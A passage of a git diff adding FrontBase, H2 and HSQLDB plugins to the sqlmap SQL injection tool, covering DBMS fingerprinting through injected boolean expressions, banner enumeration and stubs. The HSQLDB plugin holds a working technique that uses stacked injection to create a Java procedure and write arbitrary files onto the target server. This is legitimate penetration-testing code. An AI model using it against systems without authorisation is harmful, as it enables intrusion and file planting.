inject.checkBooleanExpression(check) if result: @@ -104,15 +106,7 @@ def _dialectCheck(self): return retVal def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(FIREBIRD_ALIASES) \ - or conf.dbms in FIREBIRD_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - + if not conf.extensiveFp and Backend.isDbmsWithin(FIREBIRD_ALIASES): setDbms("%s %s" % (DBMS.FIREBIRD, Backend.getVersion())) self.getBanner() @@ -122,8 +116,7 @@ def checkDbms(self): infoMsg = "testing %s" % DBMS.FIREBIRD logger.info(infoMsg) - randInt = randomInt() - result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM RDB$DATABASE WHERE %d=%d)>0" % (randInt, randInt)) + result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM RDB$DATABASE WHERE [RANDNUM]=[RANDNUM])>0") if result: infoMsg = "confirming %s" % DBMS.FIREBIRD @@ -133,7 +126,7 @@ def checkDbms(self): if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -153,7 +146,7 @@ def checkDbms(self): return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD - logger.warn(warnMsg) + logger.warning(warnMsg) return False diff --git a/plugins/dbms/firebird/syntax.py b/plugins/dbms/firebird/syntax.py index f3f801a9158..a430debce7f 100644 --- a/plugins/dbms/firebird/syntax.py +++ b/plugins/dbms/firebird/syntax.py @@ -1,21 +1,31 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import isDBMSVersionAtLeast +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> from lib.core.common import Backend + >>> Backend.setVersion('2.0') + ['2.0'] + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar" + True + >>> Backend.setVersion('2.1') + ['2.1'] + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT ASCII_CHAR(97)||ASCII_CHAR(98)||ASCII_CHAR(99)||ASCII_CHAR(100)||ASCII_CHAR(101)||ASCII_CHAR(102)||ASCII_CHAR(103)||ASCII_CHAR(104) FROM foobar" + True + """ + def escaper(value): - return "||".join("ASCII_CHAR(%d)" % ord(_) for _ in value) + return "||".join("ASCII_CHAR(%d)" % _ for _ in getOrds(value)) retVal = expression diff --git a/plugins/dbms/firebird/takeover.py b/plugins/dbms/firebird/takeover.py index 7f34eb12f4c..1fb4432d443 100644 --- a/plugins/dbms/firebird/takeover.py +++ b/plugins/dbms/firebird/takeover.py @@ -1,17 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.takeover import Takeover as GenericTakeover class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - def osCmd(self): errMsg = "on Firebird it is not possible to execute commands" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/frontbase/__init__.py b/plugins/dbms/frontbase/__init__.py new file mode 100644 index 00000000000..5d148c15aaf --- /dev/null +++ b/plugins/dbms/frontbase/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import FRONTBASE_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.frontbase.enumeration import Enumeration +from plugins.dbms.frontbase.filesystem import Filesystem +from plugins.dbms.frontbase.fingerprint import Fingerprint +from plugins.dbms.frontbase.syntax import Syntax +from plugins.dbms.frontbase.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class FrontBaseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines FrontBase methods + """ + + def __init__(self): + self.excludeDbsList = FRONTBASE_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.FRONTBASE] = Syntax.escape diff --git a/plugins/dbms/frontbase/connector.py b/plugins/dbms/frontbase/connector.py new file mode 100644 index 00000000000..2f69bfc8af3 --- /dev/null +++ b/plugins/dbms/frontbase/connector.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + def connect(self): + errMsg = "on FrontBase it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/frontbase/enumeration.py b/plugins/dbms/frontbase/enumeration.py new file mode 100644 index 00000000000..374b4f7930e --- /dev/null +++ b/plugins/dbms/frontbase/enumeration.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getBanner(self): + warnMsg = "on FrontBase it is not possible to get the banner" + logger.warning(warnMsg) + + return None + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on FrontBase it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on FrontBase it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on FrontBase it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/frontbase/filesystem.py b/plugins/dbms/frontbase/filesystem.py new file mode 100644 index 00000000000..7a6654966ee --- /dev/null +++ b/plugins/dbms/frontbase/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on FrontBase it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on FrontBase it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/frontbase/fingerprint.py b/plugins/dbms/frontbase/fingerprint.py new file mode 100644 index 00000000000..bb5e15a5c3e --- /dev/null +++ b/plugins/dbms/frontbase/fingerprint.py @@ -0,0 +1,89 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import FRONTBASE_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.FRONTBASE) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.FRONTBASE + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(FRONTBASE_ALIASES): + setDbms(DBMS.FRONTBASE) + return True + + infoMsg = "testing %s" % DBMS.FRONTBASE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("(SELECT degradedTransactions FROM INFORMATION_SCHEMA.IO_STATISTICS)>=0") + + if result: + infoMsg = "confirming %s" % DBMS.FRONTBASE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("(SELECT TOP (0,1) file_version FROM INFORMATION_SCHEMA.FRAGMENTATION)>=0") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.FRONTBASE + logger.warning(warnMsg) + + return False + + setDbms(DBMS.FRONTBASE) + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.FRONTBASE + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/frontbase/syntax.py b/plugins/dbms/frontbase/syntax.py new file mode 100644 index 00000000000..17a0a02c257 --- /dev/null +++ b/plugins/dbms/frontbase/syntax.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar" + True + """ + + return expression diff --git a/plugins/dbms/frontbase/takeover.py b/plugins/dbms/frontbase/takeover.py new file mode 100644 index 00000000000..bc7787c6109 --- /dev/null +++ b/plugins/dbms/frontbase/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on FrontBase it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on FrontBase it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on FrontBase it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on FrontBase it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/h2/__init__.py b/plugins/dbms/h2/__init__.py new file mode 100644 index 00000000000..fbefae0055a --- /dev/null +++ b/plugins/dbms/h2/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import H2_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.h2.enumeration import Enumeration +from plugins.dbms.h2.filesystem import Filesystem +from plugins.dbms.h2.fingerprint import Fingerprint +from plugins.dbms.h2.syntax import Syntax +from plugins.dbms.h2.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class H2Map(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines H2 methods + """ + + def __init__(self): + self.excludeDbsList = H2_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.H2] = Syntax.escape diff --git a/plugins/dbms/h2/connector.py b/plugins/dbms/h2/connector.py new file mode 100644 index 00000000000..ec625e31f8b --- /dev/null +++ b/plugins/dbms/h2/connector.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + def connect(self): + errMsg = "on H2 it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/h2/enumeration.py b/plugins/dbms/h2/enumeration.py new file mode 100644 index 00000000000..9dc1131d329 --- /dev/null +++ b/plugins/dbms/h2/enumeration.py @@ -0,0 +1,55 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import unArrayizeValue +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import queries +from lib.core.enums import DBMS +from lib.core.settings import H2_DEFAULT_SCHEMA +from lib.request import inject +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getBanner(self): + if not conf.getBanner: + return + + if kb.data.banner is None: + infoMsg = "fetching banner" + logger.info(infoMsg) + + query = queries[DBMS.H2].banner.query + kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True)) + + return kb.data.banner + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on H2 it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on H2 it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getCurrentDb(self): + return H2_DEFAULT_SCHEMA + + def getPasswordHashes(self): + warnMsg = "on H2 it is not possible to enumerate password hashes" + logger.warning(warnMsg) + + return {} + + def getStatements(self): + warnMsg = "on H2 it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/h2/filesystem.py b/plugins/dbms/h2/filesystem.py new file mode 100644 index 00000000000..f607dc2438c --- /dev/null +++ b/plugins/dbms/h2/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on H2 it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on H2 it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/h2/fingerprint.py b/plugins/dbms/h2/fingerprint.py new file mode 100644 index 00000000000..7125b27cec3 --- /dev/null +++ b/plugins/dbms/h2/fingerprint.py @@ -0,0 +1,121 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.enums import FORK +from lib.core.enums import HASHDB_KEYS +from lib.core.session import setDbms +from lib.core.settings import H2_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.H2) + + def getFingerprint(self): + fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) + + if fork is None: + if inject.checkBooleanExpression("EXISTS(SELECT * FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME='IGNITE')"): + fork = FORK.IGNITE + else: + fork = "" + + hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork) + + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.H2 + if fork: + value += " (%s fork)" % fork + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + if fork: + value += "\n%sfork fingerprint: %s" % (blank, fork) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(H2_ALIASES): + setDbms("%s %s" % (DBMS.H2, Backend.getVersion())) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.H2 + logger.info(infoMsg) + + result = inject.checkBooleanExpression("ZERO()=0") + + if result: + infoMsg = "confirming %s" % DBMS.H2 + logger.info(infoMsg) + + result = inject.checkBooleanExpression("LEAST(ROUNDMAGIC(PI()),3)=3") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.H2 + logger.warning(warnMsg) + + return False + else: + setDbms(DBMS.H2) + + result = inject.checkBooleanExpression("JSON_OBJECT() IS NOT NULL") + version = '2' if result else '1' + Backend.setVersion(version) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.H2 + logger.warning(warnMsg) + + return False + + def getHostname(self): + warnMsg = "on H2 it is not possible to enumerate the hostname" + logger.warning(warnMsg) diff --git a/plugins/dbms/h2/syntax.py b/plugins/dbms/h2/syntax.py new file mode 100644 index 00000000000..cfc1c86a8ca --- /dev/null +++ b/plugins/dbms/h2/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHAR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/h2/takeover.py b/plugins/dbms/h2/takeover.py new file mode 100644 index 00000000000..29ba323a57c --- /dev/null +++ b/plugins/dbms/h2/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on H2 it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on H2 it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on H2 it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on H2 it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/hsqldb/__init__.py b/plugins/dbms/hsqldb/__init__.py new file mode 100644 index 00000000000..9a667f25a38 --- /dev/null +++ b/plugins/dbms/hsqldb/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import HSQLDB_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.hsqldb.enumeration import Enumeration +from plugins.dbms.hsqldb.filesystem import Filesystem +from plugins.dbms.hsqldb.fingerprint import Fingerprint +from plugins.dbms.hsqldb.syntax import Syntax +from plugins.dbms.hsqldb.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class HSQLDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines HSQLDB methods + """ + + def __init__(self): + self.excludeDbsList = HSQLDB_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.HSQLDB] = Syntax.escape diff --git a/plugins/dbms/hsqldb/connector.py b/plugins/dbms/hsqldb/connector.py new file mode 100644 index 00000000000..429337d20bd --- /dev/null +++ b/plugins/dbms/hsqldb/connector.py @@ -0,0 +1,89 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import jaydebeapi + import jpype +except: + pass + +import logging + +from lib.core.common import checkFile +from lib.core.common import getSafeExString +from lib.core.common import readInput +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/ + User guide: https://pypi.python.org/pypi/JayDeBeApi/#usage & http://jpype.sourceforge.net/doc/user-guide/userguide.html + API: - + Debian package: - + License: LGPL & Apache License 2.0 + """ + + def connect(self): + self.initConnection() + try: + msg = "please enter the location of 'hsqldb.jar'? " + jar = readInput(msg) + checkFile(jar) + args = "-Djava.class.path=%s" % jar + jvm_path = jpype.getDefaultJVMPath() + jpype.startJVM(jvm_path, args) + except Exception as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + try: + driver = 'org.hsqldb.jdbc.JDBCDriver' + connection_string = 'jdbc:hsqldb:mem:.' # 'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db) + self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password)) + except Exception as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except Exception as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + return None + + def execute(self, query): + retVal = False + + try: + self.cursor.execute(query) + retVal = True + except Exception as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + + self.connector.commit() + + return retVal + + def select(self, query): + retVal = None + + upper_query = query.upper() + + if query and not (upper_query.startswith("SELECT ") or upper_query.startswith("VALUES ")): + query = "VALUES %s" % query + + if query and upper_query.startswith("SELECT ") and " FROM " not in upper_query: + query = "%s FROM (VALUES(0))" % query + + self.cursor.execute(query) + retVal = self.cursor.fetchall() + + return retVal diff --git a/plugins/dbms/hsqldb/enumeration.py b/plugins/dbms/hsqldb/enumeration.py new file mode 100644 index 00000000000..a45484c4571 --- /dev/null +++ b/plugins/dbms/hsqldb/enumeration.py @@ -0,0 +1,49 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import unArrayizeValue +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import queries +from lib.core.enums import DBMS +from lib.core.settings import HSQLDB_DEFAULT_SCHEMA +from lib.request import inject +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getBanner(self): + if not conf.getBanner: + return + + if kb.data.banner is None: + infoMsg = "fetching banner" + logger.info(infoMsg) + + query = queries[DBMS.HSQLDB].banner.query + kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True)) + + return kb.data.banner + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on HSQLDB it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on HSQLDB it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getCurrentDb(self): + return HSQLDB_DEFAULT_SCHEMA + + def getStatements(self): + warnMsg = "on HSQLDB it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py new file mode 100644 index 00000000000..d5e78548412 --- /dev/null +++ b/plugins/dbms/hsqldb/filesystem.py @@ -0,0 +1,60 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import randomStr +from lib.core.data import kb +from lib.core.data import logger +from lib.core.decorators import stackedmethod +from lib.core.enums import PLACE +from lib.request import inject +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on HSQLDB it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + @stackedmethod + def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + func_name = randomStr() + max_bytes = 1024 * 1024 + + debugMsg = "creating JLP procedure '%s'" % func_name + logger.debug(debugMsg) + + addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (func_name, max_bytes) + addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL " + addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'" + inject.goStacked(addFuncQuery) + + fcEncodedList = self.fileEncode(localFile, "hex", True) + fcEncodedStr = fcEncodedList[0][2:] + fcEncodedStrLen = len(fcEncodedStr) + + if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: + warnMsg = "as the injection is on a GET parameter and the file " + warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen + warnMsg += "bytes, this might cause errors in the file " + warnMsg += "writing process" + logger.warning(warnMsg) + + debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) + logger.debug(debugMsg) + + # Reference: http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures + invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (func_name, remoteFile, fcEncodedStr, max_bytes) + inject.goStacked(invokeQuery) + + logger.debug("cleaning up the database management system") + + delQuery = "DELETE PROCEDURE %s" % func_name + inject.goStacked(delQuery) + + message = "the local file '%s' has been written on the back-end DBMS" % localFile + message += "file system ('%s')" % remoteFile + logger.info(message) diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py new file mode 100644 index 00000000000..b58faee05da --- /dev/null +++ b/plugins/dbms/hsqldb/fingerprint.py @@ -0,0 +1,153 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.common import unArrayizeValue +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import HSQLDB_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.HSQLDB) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp and not conf.api: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp and not conf.api: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + actVer = Format.getDbms() + + if not conf.extensiveFp: + value += actVer + return value + + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + if re.search(r"-log$", kb.data.banner or ""): + banVer += ", logging enabled" + + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + """ + References for fingerprint: + DATABASE_VERSION() + version 2.2.6 added two-arg REPLACE functio REPLACE('a','a') compared to REPLACE('a','a','d') + version 2.2.5 added SYSTIMESTAMP function + version 2.2.3 added REGEXPR_SUBSTRING and REGEXPR_SUBSTRING_ARRAY functions + version 2.2.0 added support for ROWNUM() function + version 2.1.0 added MEDIAN aggregate function + version < 2.0.1 added support for datetime ROUND and TRUNC functions + version 2.0.0 added VALUES support + version 1.8.0.4 Added org.hsqldbdb.Library function, getDatabaseFullProductVersion to return the + full version string, including the 4th digit (e.g 1.8.0.4). + version 1.7.2 CASE statements added and INFORMATION_SCHEMA + + """ + + if not conf.extensiveFp and Backend.isDbmsWithin(HSQLDB_ALIASES): + setDbms("%s %s" % (DBMS.HSQLDB, Backend.getVersion())) + + if Backend.isVersionGreaterOrEqualThan("1.7.2"): + kb.data.has_information_schema = True + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.HSQLDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("CASEWHEN(1=1,1,0)=1") + + if result: + 